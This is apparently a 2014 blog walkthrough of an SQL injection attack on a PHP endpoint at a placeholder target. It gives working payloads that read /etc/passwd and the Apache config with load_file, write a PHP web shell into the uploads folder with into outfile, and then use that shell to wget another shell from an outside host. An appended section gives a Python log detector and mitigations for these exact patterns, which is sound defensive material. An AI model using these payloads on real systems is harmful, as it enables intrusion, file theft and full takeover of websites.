Sunday, 01 June 2014

SQL Injection Load File



Target:
https://www.target.com/ajax_city_all_branch.php?state=PANAJI

Add a single quote:
https://www.target.com/ajax_city_all_branch.php?state=PANAJI'


An SQLi error appears; use the order by 2-- command


Now change it to this:
https://www.target.com/ajax_city_all_branch.php?state=PANAJI' order by 1--+
The error is gone.

Now use https://www.target.com/ajax_city_all_branch.php?state=PANAJI' union select 1--+


Check the user:
https://www.target.com/ajax_city_all_branch.php?state=PANAJI' union select user()--+

There, it is root.
There are 2 requirements for doing this:

For creating any file on the website with SQL queries, two things are most important :)

1) Root Path (we have it from the ERROR :) )
2) File Privileges for the current MySQL user :D we have File Privileges as well :D

Next:
https://www.target.com/ajax_city_all_branch.php?state=PANAJI' union select load_file(0x2f6574632f706173737764)--+
Then press Ctrl+U.

Next we look at the path so we know where the upload goes; that is probably my layman's way of putting it :D

https://www.target.com/ajax_city_all_branch.php?state=PANAJI' UniOn SeleCt load_file(0x2f6574632f68747470642f636f6e662f68747470642e636f6e66)--+


Before that, I first tested opening the path, for example:
https://www.target.com/uploads/ << it turns out this exists, so let's see whether we can write a file there or not

https://www.target.com/ajax_city_all_branch.php?state=PANAJI' UniOn SeleCt wine ganteng into outfile '/var/www/html/upload/hai.txt

Convert "wine ganteng" to hex :D



Now let's insert this to download a backdoor :P
"<? system($_REQUEST['cmd']); ?>"
https://www.target.com/ajax_city_all_branch.php?state=PANAJI' UniOn SeleCt 0x223c3f2073797374656d28245f524551554553545b27636d64275d293b203f3e22 into outfile '/var/www/html/uploads/lol.php'-- -

Then we use wget to download a shell that has a .txt extension:
https://www.target.com/uploads/lol.php?cmd= wget http://pinjam.ac.id/a.txt
Then we change the txt extension to php:
mv a.txt index(3)php

Then just open it.

That's all, and thank you :D
gretz to ch3rn0by1 | tr0jan | G_26 and you
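
Seen from the defender's side, every request in this walkthrough leaves a recognizable trace in the web server's access log. The Python sketch below is an added example, not part of the original post: it URL-decodes each logged request, flags the `order by`, `union select`, `load_file(`, `into outfile` and `cmd=` patterns used above, and decodes `0x...` literals to show which file was read or what was written. The log lines, the IP address, the `hello` payload and the rule names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Rules for the request shapes in this post, applied to the URL-decoded query.
RULES = {
    "order_by_probe": re.compile(r"'\s*order\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+select\b", re.I),
    "load_file": re.compile(r"\bload_file\s*\(", re.I),
    "into_outfile": re.compile(r"\binto\s+(?:out|dump)file\b", re.I),
    "cmd_param": re.compile(r"(?:^|&)cmd=", re.I),
}
HEX_LITERAL = re.compile(r"\b0x((?:[0-9a-f]{2})+)\b", re.I)
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def decode_hex_literals(text):
    """Decode MySQL 0x... literals that are printable ASCII (paths, payloads)."""
    decoded = []
    for match in HEX_LITERAL.finditer(text):
        raw = bytes.fromhex(match.group(1))
        if all(32 <= b < 127 for b in raw):
            decoded.append(raw.decode("ascii"))
    return decoded

def inspect_line(line):
    """Return (matched rule names, decoded hex literals) for one log line."""
    request = REQUEST.search(line)
    if not request:
        return [], []
    query = unquote_plus(urlsplit(request.group(1)).query)
    hits = [name for name, rule in RULES.items() if rule.search(query)]
    return hits, (decode_hex_literals(query) if hits else [])

# Constructed sample lines (combined log format); the address is a documentation range.
P = '198.51.100.7 - - [01/Jun/2014:10:00:00 +0000] "GET /ajax_city_all_branch.php?state=PANAJI'
SAMPLE_LOG = [
    P + ' HTTP/1.1" 200 512',
    P + '%27%20order%20by%201--+ HTTP/1.1" 200 512',
    P + '%27%20UniOn%20SeleCt%20load_file(0x2f6574632f706173737764)--+ HTTP/1.1" 200 900',
    P + "%27%20union%20select%200x68656c6c6f%20into%20outfile%20%27/var/www/html/uploads/hai.txt%27--+"
        ' HTTP/1.1" 200 0',
    '198.51.100.7 - - [01/Jun/2014:10:05:00 +0000] "GET /uploads/lol.php?cmd=id HTTP/1.1" 200 40',
]

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        hits, literals = inspect_line(entry)
        if hits:
            print(hits, literals, entry.split('"')[1])
```

The two preconditions the post lists are also the mitigations: an application database account without the MySQL FILE privilege, together with a restrictive `secure_file_priv` setting, blocks both `load_file()` and `into outfile`. Parameterized queries remove the injection point itself.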